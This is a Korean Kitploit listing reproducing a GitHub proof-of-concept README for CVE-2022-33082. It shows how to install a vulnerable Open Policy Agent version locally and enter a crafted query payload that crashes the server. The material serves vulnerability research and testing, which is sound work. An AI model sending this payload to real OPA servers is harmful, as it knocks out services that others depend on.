cve-2022-33082-exploit — CVE-2022-33082에 대한 개념 증명 익스플로잇으로, 조작된 입력을 통해 Open Policy Agent 버전 ≤0.41.0에서 서비스 거부를 유발합니다. 승인된 테스트 및 교육 목적으로 사용하도록 설계되었습니다. | Kitploit
도구 / GitHub / cyberqueenmeg / cve-2022-33082-exploit
cyberqueenmeg/cve-2022-33082-exploit cve-2022-33082-exploit CVE-2022-33082에 대한 개념 증명 익스플로잇으로, 조작된 입력을 통해 Open Policy Agent 버전 ≤0.41.0에서 서비스 거부를 유발합니다. 승인된 테스트 및 교육 목적으로 사용하도록 설계되었습니다.
커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.
지난 7일 지난 30일
1 1 3년 전CVE 2022-33082 익스플로잇
면책 고지
이 코드는 윤리적 목적으로 제공됩니다. 즉, 취약점을 이해하고 자신의 시스템 또는 인증된 시스템을 테스트하기 위함입니다. 이 코드를 사용함으로써 귀하는 윤리적으로 행동할 것에 동의하며, 귀하가 윤리적으로 행동하지 않을 경우 저는 어떠한 책임도 지지 않습니다.
이 익스플로잇은 Open Policy Agent (OPA) 버전 0.41.0 이하에서 작동합니다. Linux에 OPA 인스턴스를 설치하여 테스트하려면 다음 명령어를 사용하세요:
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
그런 다음 웹 브라우저에서 localhost:8181로 이동합니다. 아래 내용을 각 필드에 입력하세요. 쿼리 필드 (Go 코드):
p := [input() | input := 1]
{ "input":"put this in the input (json) field!" }
그러면 웹사이트가 충돌하고 서버를 실행 중인 터미널에 커널 패닉이 보고됩니다.
영향
OPA 서버 버전 0.41.0 이하에 웹 접근 권한이 있는 사람은 누구나 서버를 완전히 충돌시킬 수 있습니다. 이 서버는 기본적으로 비밀번호로 보호되지 않습니다.